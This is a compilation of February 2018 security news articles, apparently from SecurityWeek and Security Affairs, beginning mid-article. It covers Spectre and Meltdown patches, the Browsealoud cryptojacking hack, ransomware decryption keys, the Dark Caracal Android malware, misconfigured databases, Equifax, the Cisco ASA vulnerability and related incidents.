The computer maker also notes that, while it “initially did not plan to remediate these issues,” Broadcom released patches after the WPA2 KRACK vulnerability became public, to address both bugs.

“Lenovo received the first of these near the end of 2017, and continues releasing fixes as integration and testing is completed,” the company says.

Lenovo explains that only its ThinkPad products pack the affected Broadcom WiFi controllers. The computer maker also published a list of all impacted ThinkPad devices and recommends users to update to the WiFi driver version (or newer) indicated for their models.


IBM Releases Spectre, Meltdown Patches for Power Systems
12.2.2018 securityweek
Vulnerebility
IBM has released firmware and operating system updates to address the Meltdown and Spectre vulnerabilities in the company’s Power Systems servers.

IBM started releasing firmware patches for its POWER processors within a week after the Spectre and Meltdown attack methods were disclosed. Firmware updates were first released for the POWER7+ and POWER8 processors, but customers would have to wait another month for operating system patches.

The company announced late last week the availability of patches for remaining POWER processors, along with updates for its AIX and IBM i operating systems.

Firmware patches are now available for POWER7, POWER7+, POWER8 and POWER9 processors. Earlier versions will not receive updates as they have reached end of service and IBM recommends migrating to a supported generation.

The vulnerabilities that allow Meltdown and Spectre attacks (CVE-2017-5753, CVE-2017-5715 and CVE-2017-5754) have also been patched in IBM i with the release of program temporary fixes (PTFs) for versions 7.1, 7.2 and 7.3. Fixes have also been released for AIX 5.3, 6.1, 7.1 and 7.2, and VIOS 2.2.x.

Both firmware and operating system updates must be installed for efficient protection against Meltdown and Spectre attacks. However, it’s recommended that the firmware patches are applied prior to operating system updates.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

Impacted vendors started releasing software and firmware patches shortly after the methods were disclosed, but both types of fixes caused problems.

A few weeks after it started releasing microcode patches, Intel decided to halt updates due to frequent reboots and unpredictable system behavior. The company now says it has identified the root cause of the problem and started releasing a new round of patches.

Intel and AMD told customers that their future products will include built-in protections for exploits such as Specter and Meltdown.


Crypto Mining Malware Infects Thousands of Websites
12.2.2018 securityweek CoinMine
Hacked Script Infects Several Government Sites with Cryptominer

The websites of numerous government, health and education organizations worldwide were infected with a crypto-currency miner over the weekend, after a script running on all of them was maliciously modified.

The culprit was Browsealoud, a script developed by Texthelp to add “speech, reading, and translation to websites.” The software was designed to provide access and participation to people with Dyslexia, Low Literacy, English as a Second Language, and to those with mild visual impairments, the company says.

Over the weekend, Texthelp was the target of a cyber-attack that resulted in a JavaScript file, part of the Browsealoud script, being modified. Because of that, Browsealoud would inject a Coinhive cryptojacking script into the visitors’ browsers, to turn them into crypto-currency mining machines.

“At 11:14 am GMT on Sunday 11th February 2018, a JavaScript file which is part of the Texthelp Browsealoud product was compromised during a cyber-attack. The attacker added malicious code to the file to use the browser CPU in an attempt to illegally generate cryptocurrency. This was a criminal act and a thorough investigation is currently underway,” the company revealed in a blog post.

As a result of this attack, numerous government websites in the United Kingdom, the United States, and Australia were infected with the crypto-mining software.

As Scott Helme, the researcher who noticed the malicious script quickly discovered, a total of 4275 websites were impacted in this attack, including prominent sites such as UK's Information Commissioner's Office, the NHS, the General Medical Council, U.S. Courts, academic websites, and many others.

“The ba.js had been altered to include a document.write call that added a CoinHive crypto miner to any page it was loaded in to. The sheer number of sites affected by this is huge and some of them are really prominent government websites,” Helme points out.

The reason so many websites were impacted isn’t only the ease of use Browsealoud promises, as admins only need to copy and paste one script to take advantage of it, but also regulatory requirements around accessibility that many sites need to comply with, especially government sites.

Soon after realizing the cause of the infection, Helme notified Texthelp, which decided to take Browsealoud offline, thus removing it from all of their customer sites immediately. The company claims that taking the product down allowed them to address the issue without requiring customers to take action.

“Texthelp can report that no customer data has been accessed or lost. The company has examined the affected file thoroughly and can confirm that it did not redirect any data, it simply used the computers CPUs to attempt to generate cryptocurrency. The exploit was active for a period of four hours on Sunday,” Martin McKay, CTO and Data Security Officer, Texthelp, says.

McKay also noted that, although the issue has been addressed, Browsealoud will remain offline until Tuesday, so that customers could be informed on the issue. He also pointed out that no other Texthelp products have been affected.

“A security review will be conducted by an independent security consultancy. The investigation is ongoing, and customers will receive a further update when the security investigated has been completed,” McKay concluded.

UK’s National Cyber Security Centre also said they were examining the incident.

“The affected service has been taken offline, largely mitigating the issue. Government websites continue to operate securely. At this stage there is nothing to suggest that members of the public are at risk,” the NCSC said.

However, it appears that the issue might have not been completely resolved, as Helme points out on Twitter. The researcher claims that even today the malicious script attempts to load when accessing the UK's Information Commissioner's Office website, likely from cache. This means that returning visitors might still be impacted.


NoMoreRansom: Free Decryption for Latest Cryakl Ransomware
12.2.2018 securityweek
Ransomware
Decryption keys for a current version of Cryakl ransomware have been obtained and uploaded to the NoMoreRansom website. Victims of Cryakl can potentially recover encrypted files with the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom.

NoMoreRansom is a collaborative public/private project launched by Europol, the Dutch National Police, Kaspersky Lab and McAfee in July 2016. Its purpose is to help ransomware victims recover encrypted files through the use of decryptors. Since its launch, other national law enforcement agencies and additional private companies have joined the project. There are now 52 decryption tools available on the site, able to recover files from 84 ransomware families.

The project now comprises more than 120 partners, including more than 75 private organizations. The Cypriot and Estonian police are the most recent law enforcement agencies to join, while KPN, Telenor and The College of Professionals in Information and Computing (CPIC) have joined as new private sector partners. Europol claims that the site has enabled more than 35,000 ransomware victims to recover their files without paying a ransom – preventing criminals from profiting from more than €10 million.

The Rakhni Decryptor, developed by Kaspersky Lab, could already decrypt older versions of Cryakl – which first appeared in 2015. It could not, however, decrypt the latest version – which it now does.

The Belgian Federal Computer Crime Unit (FCCU) learned that Belgian citizens had been victims of this new version of Cryakl. It was able to locate a C2 server in an unspecified neighboring country. The Netherlands is one neighbor state that is often used by criminals to host their malicious servers.

“Led by the federal prosecutor's office,” announced Europol Thursday, “the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys.” Kaspersky Lab provided technical expertise, and has now included the recovered keys in its Rakhni Decryptor, uploaded on behalf of the Belgian authorities.

The Rakhni Decryptor, says Kaspersky Lab, “Decrypts files affected by Rakhni, Agent.iih, Aura, Autoit, Pletor, Rotor, Lamer, Cryptokluchen, Lortok, Democry, Bitman (TeslaCrypt) version 3 and 4, Chimera, Crysis (versions 2 and 3), Jaff, Dharma and new versions of Cryakl ransomware.”

The Belgian authorities are continuing their investigation into the operators of the seized C2 servers, but decided not to wait before making the recovered keys available to victims. It is, says Europol, “another successful example of how cooperation between law enforcement and internet security companies can lead to great results.”


CSE CybSec ZLAB Malware Analysis Report: Dark Caracal and the Pallas malware family
12.2.2018 securityaffairs  Android
Dark Caracal APT – The Pallas Family

Researchers from CSE ZLAB malware Analysis Laboratory analyzed a set of samples of the Pallas malware family used by the Dark Caracal APT in its hacking operations.
The malware researchers from ZLab analyzed a collection of samples related to a new APT tracked as Dark Caracal, which was discovered by Electronic Frontier Foundation in collaboration with Lookout Mobile Security.

Dark Caracal has been active at least since 2012, but only recently it was identified as a powerful threat actor in the cyber arena.

The first analysis of the APT linked it to Lebanese General Directorate of General Security.

Dark Caracal is behind a number of stealth hacking campaigns that in the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

One of their most powerful campaigns started in the first months of last year, using a series of trojanized Android applications to steal sensitive data from the victim’s mobile device. The trojan injected in these applications is known in the threat landscape with the name Pallas.

Threat actors use the “repackaging” technique to generate its samples, they start from a legitimate application and inject the malicious code before rebuilding the apk.

The target applications belongs to specific categories, such as social chat app (Whatsapp, Telegram, Primo), secure chat app (Signal, Threema), or software related to secure navigation (Orbot, Psiphon).

The attackers used social engineering techniques to trick victims into installing the malware. Attackers use SMS, a Facebook message or a Facebook post, which invites the victim to download a new version of the popular app through from a specific URL

http://secureandroid[.]info,

All the trojanized app are hosted at the same URL.

Dark Caracal
Figure 1 – Dark Caracal Repository – Malicious site

This malware is able to collect a large amount of data and to send it to a C&C through an encrypted URL that is decrypted at runtime. The capabilities of the trojan are:

Read SMS
Send SMS
Record calls
Read calls log
Retrieve account and contacts information
Gather all stored media and send them to C2C
Download and install other malicious software
Display a phishing window in order to try to steal credentials
Retrieve the list of all devices connected to the same network
Further details are included in the complete report published by CSE.


Thousands More Personal Records Exposed via Misconfigurations

12.2.2018 securityweek Incindent
Two more misconfigured databases exposing the personal details of thousands of people were disclosed late last week.

The Maryland Joint Insurance Association (MDJIA, with offices in Ellicott City, MD) left internet access to a data repository of customer files containing information such as customer names, addresses, phone numbers, birth dates, and full Social Security numbers; together with financial data such as check images, full bank account numbers, and insurance policy numbers. Also exposed were MDJIA access credentials for ISO ClaimSearch, a third-party insurance database containing ‘tens of millions of reports on individual insurance claims’ for industry professionals. The problem was a NAS server with an open port 9000.

Paris-based Octoly, a brand marketing firm, left open internet access to an AWS S3 bucket. This contained details of its IT operations, including sensitive personal details of more than 12,000 social media influencers used in its marketing campaigns. The details include the real names, addresses, phone numbers, email addresses – including those specified for use with PayPal – and birth dates, together with thousands of hashed passwords.

Both misconfigurations were discovered by Chris Vickery, the director of cyber risk research at UpGuard. Researcher Vickery has discovered numerous misconfigurations providing open access to sensitive, often personal, information over the last few years. Examples include details of 191 million U.S. voters, nearly 1.4 billion user records exposed by known spammers, and sensitive military data belonging to the U.S. National Geospatial-Intelligence Agency (NGA) left exposed by contractor Booz Allen Hamilton.

None of these misconfigurations require any hacking effort or skill to exploit, merely a computer with internet access. If a white hat researcher such as Vickery can find them, potentially any malicious actor could also find them with disastrous results. The question then is, why do misconfigurations, rated #6 in the OWASP top ten threats list, happen so frequently – and what should organizations do to prevent them?

Bryce Carlen; CIO at Washington State Department of Commerce, notes that MDJIA is a small organization with minimal – if any – dedicated IT staff. He warns that there may be many more small organizations in a similar position. “If this is as small an organization as it appears to be, then all of this is no real surprise. If you only have the budget for one or two IT staff or contractors, it's likely you're not going to have dedicated security staff or deep security expertise in the generalists you have working for you.” The problem, he added, is that small organizations don't understand the risks until after a cybersecurity event, because protecting data is not part of the core business based around using that data.

The Octoly incident is similar to many other examples of exposed AWS S3 buckets. “Every time I look at the AWS control panel, it seems like there are new services available, each of which comes with new settings and configuration switches. It's especially tough when you layer that on top of the constantly evolving job of securing your on-prem environment against shifting threats,” Carlen said.

He fears that the cloud is simply increasing 'security fatigue', leading to simple errors. “It's one of the things that frightens me about the cloud. There are a bunch of what appear to be otherwise competent organizations making a big mess with cloud configuration settings.”

Randy Potts, information security leader at Real Time Resolutions, Inc, believes the problem is still a missing 'culture of security' in many organizations. “Both of these incidents [last week] happened because the person that deployed them did not think about the bad actors. They only think about giving access to the people that need it, not preventing access from those that should not have it.”

He believes that it is the continuing point of tension between IT and information security. “IT is measured by uptime and functionality, but information security is measured by controlling access to data. From the IT perspective, information security risks breaking access and harming functionality.” He believes that IT personnel need to understand security better: “They need to respect that while not taking that extra step may save time now, it can have a serious impact to the organization later.”

But the problem goes beyond just IT and security into the entire corporate culture; that is, “the moral obligation that everyone handling sensitive information has to the people that correspond to that PII.” That includes the business owners as well as the IT staff and the security team.

This is a theme agreed by Graham Mann, managing director at CyberSpace Defence Ltd. “Management must shoulder their portion of the blame because they simply do not attach sufficient importance to security,” he says. He believes it is an area that can be addressed by legislation – indeed, it has already been addressed by the EU's General Data Protection Regulation (GDPR).

“GDPR specifically addresses the issues outlined in these so-called misconfiguration problems,” he told SecurityWeek; “and had Octoly happened five months later, they would now be facing a significant fine. Moreover, given the closeness of GDPR, it’s somewhat amazing that Octoly hasn't yet put measures in place to avoid such catastrophes.

“Misconfigurations are entirely feasible and easy to make when you are rushing to implement a device or making seemingly innocuous modifications to existing devices,” he continued. “Most IT administrators probably never consider the implications or consequences of making such errors. That’s why you need to consider the potential repercussions in advance (as specified in GDPR); you need to undertake a risk analysis on everything you do -- what could go wrong and what can we do to ensure any errors are mitigated. This is where management are critical: the involvement of security must be supported from above.”

Security researcher and consultant, Stewart Twynham, goes one step further. He believes the gaps between IT and security can be closed by treating both as aspects of corporate governance. “Professional IT people are under constant pressure to get things done, which is why security should be treated as a governance issue as well as an IT one,” he suggests. “Without those checks and balances (have we carried out the due diligence? do we fully understand the technology? do we understand the risks? do we have a process in place to continuously review what weíve set up?) mistakes like this will continue to happen.”

In short, misconfigurations will continue to occur while the pressure on IT to react instantly to business requirements goes unabated. Any alteration to the IT infrastructure should involve the security team before implementation. But this will require senior management to own the problem under an overarching corporate governance regime – and when that happens, misconfigurations will be less common.


New Details Surface on Equifax Breach
12.2.2018 securityweek Incindent
Documents provided recently by Equifax to senators revealed that the breach suffered by the company last year may have involved types of data not mentioned in the initial disclosure of the incident.

In mid-May 2017, malicious actors exploited a known vulnerability in the Apache Struts development framework to gain unauthorized access to Equifax systems. The company said the breach affected roughly 145 million customers – mostly in the U.S., but also in Canada and the United Kingdom – including their social security numbers, dates of birth, addresses, and in some cases driver’s license numbers, payment cards, and dispute documents.

Confidential documents sent by Equifax to the Senate Banking Committee, copies of which were seen by CNN and The Wall Street Journal, show that hackers may have also stolen tax identification numbers, email addresses, and driver’s license information other than just license numbers.

In response to news reports, Equifax said its initial disclosure was never intended to include all the types of information that may have been compromised.

U.S. Senator Elizabeth Warren has called on Equifax to provide clarifications on what she has described as “conflicting, confusing and incomplete information” provided by the company to the public and Congress.

According to Sen. Warren, Equifax told the Banking Committee in early October that passport numbers had also been included in the database tables possibly accessed by the attackers, but now the credit reporting agency claims passports were not compromised.

“As your company continues to issue incomplete, confusing and contradictory statements and hide information from Congress and the public, it is clear that five months after the breach was publicly announced, Equifax has yet to answer this simple question in full: what was the precise extent of the breach?” Sen. Warren wroten in a letter to Equifax.

The senator has given Equifax one week to provide a full and complete list of data elements confirmed or believed to have been compromised in the breach, along with a timeline of its efforts to determine the full extent of the intrusion.

Sen. Warren last week published a 15-page report containing the findings of her own four-month investigation into Equifax’s failures. The lawmaker’s investigation found that the company had set up a flawed system to prevent data security incidents, it ignored numerous warning of risks to customer data, it failed to disclose the breach to stakeholders in a timely manner, and provided inadequate assistance and information to consumers. The report also said Equifax had taken advantage of federal contracting loopholes to force the IRS into signing a contract.

Earlier this year, senators Warren and Mark Warner introduced a bill that would provide the Federal Trade Commission (FTC) with punitive powers over the credit reporting industry for poor cybersecurity practices. The bill came in response to the Equifax breach.

Reuters reported earlier this month that Mick Mulvaney, the head of the Consumer Financial Protection Bureau (CFPB), had halted the probe into the Equifax breach. Following the news, 32 senators sent a letter CFPB asking for additional information on its investigation.


49% of crypto mining scripts are deployed on pornographic related websites
12.2.2018 securityaffairs CoinMine

The number of crypto mining scripts discovered by security experts continues to increase, especially those ones illegally deployed by hacking servers online.
The experts from Qihoo 360’s Netlab analyzed crypto mining scripts online by analyzing DNS traffic with its DNSMon system. The experts were able to determine which sites load the scripts from domains associated with in-browser mining services.

According to the researchers, 49% of crypto mining scripts are deployed on pornographic related websites.

The study revealed that cryptocurrency mining scripts are also deployed on fraud sites (8%), advertising domains (7%), and cryptocurrency mining (7%).

“0.2% of websites have web mining code embedded in the homepage : 241 (0.24%) in Alexa Top 100,000 websites, 629 (0.21%) in Alexa Top 300,000 websites” reads the analysis published by NetLab.

“Pornographic related websites are the main body , accounting for 49% of these websites. Others include fraud (8%), advertising (7%), mining (7%), film and television (6%) and other categories”

The most used crypto mining script is Coinhive (68%+10%), followed by JSEcoin (9%).
crypto currency mining scripts

The fact that cryptocurrency mining scripts are most deployed on porn websites is not a surprise because they have a large number of visitors that used to spend a lot of time watching their content.

Mining activities online are rapidly increasing, the following graph shows the mining site DNS traffic trends:

crypto currency mining scropts 2.png

Below the categories of new actors most involved in mining activities:

Advertisers : The mining activity of some websites is introduced by the advertisers’ external chains
Shell link : Some websites will use a “shell link” to obscure the mining site link in the source code
Short domain name service provider : goobo . COM .br Brazil is a short domain name service provider, the website home page, including a short domain name through the service generated when access to the link will be loaded coinhive mining
Supply chain contamination : the WWW . Midijs . NET is a JS-based MIDI file player, website source code used in mining to coinhive
Self-built pool : Some people in github open source code , can be used to build from the pool
Web users informed mining : authedmine . COM is emerging of a mining site, the site claims that only a clear case of known and authorized users, began mining


Thousands of websites worldwide hijacked by cryptocurrency mining code due Browsealoud plugin hack
12.2.2018 securityaffairs CoinMine

Thousands of websites worldwide hijacked by a cryptocurrency mining code due to the hack of the popular Browsealoud plugin.
A massive attack hit thousands of websites around the world, crooks deployed Coinhive scripts forcing them to secretly mine cryptocurrencies on visitors’ browsers.

The list of compromised websites (4275) includes the UK’s NHS, Information Commissioner’s Office (ICO) (ico.org.uk), the UK’s Student Loans Company (slc.co.uk), The City University of New York (cuny.edu), and the US government’s court system.

Once discovered the hack some sites web down, the ICO also took its website down.

The compromised websites use the Browsealoud plugin which makes their content accessible for blind or partially sighted people by reading it.

In a time-window of roughly seven hours (between 0300 and 1145 UTC), all the websites using Browsealoud inadvertently ran the Monero cryptocurrency mining code.

The attackers injected an obfuscated version of the mining code in the plugin that once converted from hexadecimal back to ASCII allowed to load the mining code in the webpage.

cryptocurrency mining script obfuscated_mining_code

The alarm was thrown by the security expert Scott Helme who was contacted by a friend who sent him antivirus software warnings received after visiting a UK ICO website.

“This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.” said Helme.

“Someone just messaged me to say their local government website in Australia is using the software as well.”



Scott Helme

@Scott_Helme
Ummm, so yeah, this is *bad*. I just had @phat_hobbit point out that @ICOnews has a cryptominer installed on their site... 😮

2:46 PM - Feb 11, 2018
739
789 people are talking about this
Twitter Ads info and privacy
The expert suggests using the Subresource Integrity (SRI) technique to block unwanted code injected in affected websites.

Texthelp, the company that developed the Browsealoud plugin, has removed its Browsealoud code from the web to stop the cryptocurrency mining operation.

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year and our data security action plan was actioned straight away,” said Texthelp’s chief technology officer Martin McKay in a statement.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline.”

Texthelp confirmed that “no customer data has been accessed or lost,” and “customers will receive a further update when the security investigation has been completed.”


Texthelp for Edu
@texthelp
Our Data security investigation underway at Texthelp, statement on our website: http://okt.to/EtJobI
Browsealoud was automatically removed from all our customers' websites in response. No action needed by our customers.

10:20 PM - Feb 11, 2018
3
See Texthelp for Edu's other Tweets
Twitter Ads info and privacy
The malicious code was removed by 1600 UTC today, the UK’s ICO is currently in a minimal “maintenance” mode as a precaution.


U.S. Spies Bilked for $100,000 by Russian Peddling Trump Secrets: Report
11.2.2018 securityweek BigBrothers
A Russian man promising stolen hacking tools and compromising information on President Donald Trump fleeced American spies for $100,000 last year, The New York Times reported Friday.

In a story worthy of a John le Carre novel that included secret USB-drive handovers in a small West Berlin bar and coded messages delivered over the National Security Agency's Twitter account, CIA agents reportedly spent much of last year trying to buy back from the Russian hacking programs stolen from the NSA.

The seller, who was not identified but had links to both cyber criminals and Russian intelligence, tantalized the US spies with an offer of the NSA hacking tools that had been advertised for sale online by a shady group called the Shadow Brokers.

Some of the tools, developed by the NSA to break into the computers of US rivals, were used by other hackers last year to break into computer systems around the world, including the global malware attack last May.

The seller, reached through a chain of intermediaries, wanted $1 million.

The $100,000, delivered in a cash-stuffed suitcase handed over in a Berlin hotel room, was an initial payment by US agents still dubious he really had what he was promising.

- Trump kompromat -

The seller also repeatedly pressed US agents with offers of compromising materials, or kompromat, on Trump, the Times said, citing US and European intelligence officials.

Although an investigation was already underway back in Washington on the link between Moscow and the Trump campaign, the agents did not want to get involved in anything that smelled of the politics back home.

The story -- which was also reported by The Intercept, an online magazine on nationals security matters -- paints a classic spy versus spy story where the US agents aren't ever certain about who they are dealing with and whether or not they are being baited and played by their Russian counterparts.

US intelligence officials say Russia interfered with the 2016 election to help elect Trump, and continues to use disinformation to sow confusion in the American political system.

The Intercept reported that the operation created rifts in the CIA, which is led by Trump loyalist Mike Pompeo but has many staffers still smarting over the president's repeated harsh comments about the intelligence community's role in the Russia meddling investigation.

The Russian's first delivery turned out to be hacking tools the Shadow Brokers had already released.

And he kept pushing his offer of kompromat on Trump, including shady financial records and a sex video that the US spies didn't really want.

In the end, the deal broke down last month -- the Russian did not come up with any of the unreleased NSA materials, and the Trump-related materials were either already known or untrustworthy.

The Russian was told by the Americans to leave Western Europe and not return, according to the Times.


South Korea Probes Cyber Shutdown During Olympics Ceremony
11.2.2018 securityweek BigBrothers
South Korea on Saturday investigated a mysterious internet shutdown during the Winter Olympics opening ceremony, which follows warnings of possible cyberattacks during the Pyeongchang Games.

Internal internet and wifi systems crashed at about 7:15 pm (1015 GMT) on Friday and were still not back to normal at midday on Saturday, Games organizers said.

Cyber-security teams and experts from South Korea's defence ministry, plus four other ministries, formed part of a taskforce investigating the shutdown, they said, adding that it didn't affect the high-tech opening ceremony.

Kim Yo Jong, the sister of North Korean leader Kim Jong Un, South Korean President Moon Jae-in and US Vice-President Mike Pence were among the VIPs at Pyeongchang Olympic Stadium late on Friday.

The outage follows warnings of malware phishing attacks targeting organizations working at the Olympics, and allegations of cyberattacks from Russia -- which has denied any involvement.

North Korea has also blamed for a series of cyber incidents including the WannaCry global ransomware attack, which infected 300,000 computers worldwide last May.

"We don't want to speculate because we're still trying to find out what the root source is," said Nancy Park, a spokeswoman for the Games organisers.

"We have some reports, we've been working all night trying to find out and working with our partners."

- WannaCry -

South Korea showed off its technical expertise with a dazzling gala opening ceremony on Friday which included state-of-the-art special effects and augmented reality to add extra impact for TV viewers.

While internet and wifi were affected across the Olympic site -- spread over two main venues in mountainous eastern South Korea -- organisers said there was no impact on competition, which got into full swing on Saturday.

"There were some issues that impacted some of our non-critical systems last night for a few hours," Games organizers said in a statement.

"These have not disrupted any events, or had any effect on the safety and security of any athletes or spectators," they added.

"All competitions are running as planned and the systems are working at the expected level."

Last month, cyber-security firm McAfee said it had uncovered an attack targeting organisations involved with the Olympics, using a malicious email attachment.

North Korea has been accused of involvement in a number of cyber incidents, including WannaCry -- although it has slammed that accusation as "absurd".

Russia has also denied launching any hacking attacks on the Pyeongchang Olympics, where its team is formally banned following the revelation of systemic doping.

While organizers wouldn't comment on the possibility that an attack was behind the shutdown, experts believe disrupting the Games would be seen as a coup for many hackers.

"The whole world’s watching. It's one of the largest stages you can possibly have to get a message out there," Ross Rustici, senior director for intelligence Boston-based Cybereason told the Tribune News Service.

"You got a lot of lower-tier guys going after these games. It's head-hunting, bragging rights," Rustici was quoted as saying.


Hackers are exploiting the CVE-2018-0101 CISCO ASA flaw in attacks in the wild
11.2.2018 securityaffairs
Vulnerebility

Hackers are exploiting the CVE-2018-0101 CISCO ASA flaw in attacks in the wild and a Proof-of-concept exploit code is available online.
This week, Cisco has rolled out new security patches for a critical vulnerability, tracked as CVE-2018-0101, in its CISCO ASA (Adaptive Security Appliance) software.

This is the second the tech giant issued a security patch to fix the critical vulnerability in CISCO ASA, the first one released in January. The vulnerability could be exploited by a remote and unauthenticated attacker to execute arbitrary code or trigger a denial-of-service (DoS) condition causing the reload of the system.

The affected models are:

3000 Series Industrial Security Appliance (ISA)
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
ASA 1000V Cloud Firewall
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4110 Security Appliance
Firepower 9300 ASA Security Module
Firepower Threat Defense Software (FTD)
Now the company confirmed that attackers are trying to exploit the vulnerability CVE-2018-0101 in attacks in the wild.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of public knowledge of the vulnerability that is described in this advisory,” reads the security advisory published by CISCO. the update states. “Cisco PSIRT is aware of attempted malicious use of the vulnerability described in this advisory.”

The vulnerability was discovered by Cedric Halbronn and received a CVSS base score of 10.0, the highest one.

This week Halbronn presented its findings at the REcon conference in Brussels, in its speech titled ‘Robin Hood vs CISCO ASA Anyconnect.’ he highlighted that the vulnerability could be present up to seven years old because the AnyConnect Host Scan is available since 2011.

The new attack scenario covered with the new update sees an attacker exploiting the vulnerability by sending specially crafted XML packets to a webvpn-configured interface.

CISCO ASA attack

A “Cisco ASA CVE-2018-0101 Crash PoC” was already published by some users on Pastebin.


FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins
11.2.2018 securityaffairs CoinMine

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility because they are suspected for trying to using a supercomputer at the plant to mine Bitcoin.
The peaks reached by the values of principal cryptocurrencies is attracting criminal organizations, the number of cyber-attacks against the sector continues to increase, and VXers are focusing their efforts on the development of cryptocurrency/miner malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at Radiflow, a provider of cybersecurity solutions for critical infrastructure, have discovered in a water utility the first case of a SCADA network infected with a Monero cryptocurrency-mining malware.

“Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

The Radiflow revealed that the cryptocurrency malware was designed to run in a stealth mode on a target system and even disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have e dramatic impact on ICS and SCADA systems because it could increase resources consumption affecting the response times of the systems used to control processes in the environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities charged for mining cryptocurrency with “office computing resources.”

The nuclear research plant is located in Sarov, in 2011, the Russian Federation Nuclear Center deployed on a new petaflop-supercomputer.

The scientists are accused to have abused the computing power of one of Russia’s most powerful supercomputers located in the Federal Nuclear Center to mine Bitcoins.

Russian Federation Nuclear Center facility

The supercomputer normally isolated from the Internet, but the researchers were discovered while attempting to connect it online. the Federal Security Service (FSB) has arrested the researchers.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,”


Online Auction Safety Tips for Buyers and Sellers
11.2.2018 securityaffairs Security

Buying or selling goods through online auctions is more popular than ever. Which are the best practices to follow for buyers and sellers for an online auction?
Buying or selling goods through online auctions is more popular than ever. Today, there are a number of different auctions sites available where sellers can post new and used items for sale.

Buyers often flock to these marketplaces, largely because auction prices tend to be quite low. Additionally, buying through online auctions is a great way to find unique items or collectibles that you simply can’t buy through traditional retail stores.

The vast majority of transactions that take place through these sites go off without a hitch. Occasionally, however, problems do occur.

There are instances where unscrupulous buyers or sellers try to take advantage of other people on the auction site.

By following a few simple online auction safety tips, you can ensure that you don’t fall victim to a scam.

A good place to start is by familiarizing yourself with some of the common risks including the following:

Sellers sometimes try to scam buyers by failing to send out items after they have already been paid for. Buyers, on the other hand, sometimes take advantage of sellers by failing to pay for the item after the seller has already sent it to them or claiming that they never received the item in order to get a refund.
Hackers or online thieves can take control of your account if they get access to your password. Not only can they use your account to make purchases but they can also steal your identity.
Buyers or sellers can sometimes use the personal information that is exchanged during a sale to steal your identity. For instance, if you use a personal check to pay for an item, and unscrupulous seller may try to steal your identity based on the information printed on your check.
Sellers sometimes may try to sell you a knockoff or copy rather than the actual item you are interested in purchasing.
Phishing scams may try to get you to share your information by posing as the auction site or as your payment processor. In most cases, these scams are designed to try to gain access to your banking information or to your password so that the perpetrators can steal your identity.
online auction

Now that you have a better idea of all of the things that can go wrong when buying through an online auction, you can take steps to prepare yourself. A good place to start is by familiarizing yourself with how each auction site is set up. Before posting an item for sale or placing a bid, spend some time performing the following tasks:

Try to get a sense of how the auction site works by watching several items. Pay particular attention to what happens at the end of the auction to see if there is a lot of last-minute bidding. You can then put auction software to work for you on bidding and selling.
Familiarize yourself with the website’s Terms of Use. Make sure you have a clear understanding of the various fees that are charged to both sellers and buyers.
Additionally, find out what steps they take to help protect users in the event that something goes awry with a transaction. Make sure that you fully understand the site’s rules before buying or selling items through their platform.
Find out what forms of payment the website recommends. In most cases, the best option is to use a service like PayPal rather than relying on other payment methods. Personal checks, wire transfers, money orders, cash, and credit or debit cards can be risky for both buyers and sellers. Services such as PayPal provide protection against problems that are commonly experienced online.
Protect your identity when creating your profile. Avoid including personally identifiable information in your profile. Try to keep your screen name and user account as anonymous as possible.
Choose your password carefully. The last thing that you want is for someone to be able to guess your password or to break it easily using software tools. Make sure your password is a minimum of 10 characters long. Include upper and lowercase letters along with symbols and numbers. Avoid including personal information such as your birthdate, age, or name in your password. Additionally, choose a different password for every site that you are on.
That way, even if hackers figure out your password on one site, they won’t be able to access your profiles on other sites.

Online auction – Before making a purchase or listing an item for sale, be sure to do careful research.

Start by taking a closer look at the reputation of the seller or buyer. Typically, the best option is to buy from sellers who have been selling through the platform for a long period of time and who have good feedback from buyers. Make sure all the transactions are completed through the auction site. Don’t fall for the scam where a seller tries to offer you a lower price if you buy the item from them directly rather than buying through the auction site.
Learn as much as you can about the item you are selling or buying. Find out how much the item is currently worth. Make sure that it is authentic and figure out what type of condition it is in. Buyers may want to consider saving a screenshot of the description so that they have proof that they can turn to if the item doesn’t live up to the seller’s promises.


Facebook Increases Bug Bounty Payout After Audit
10.2.2018 securityweek
Social

Facebook decided to increase a researcher’s bug bounty payout after discovering that that a bug he reported could lead to account takeover.

In September 2017, security researcher Josip Franjkoviæ discovered an issue with Facebook’s partners portal, which leaked users’ email addresses. The bug was discovered after one of the researcher’s sites was approved to participate in the Free Basics project by Facebook.

What the researcher discovered was a medium-high impact privacy bug where adding a new admin user would leak their email address in subsequent notification emails.

Basically, for a newly added admin, the notifications emails would contain the admin's primary Facebook email through a parameter in one of the links, the security researcher discovered.

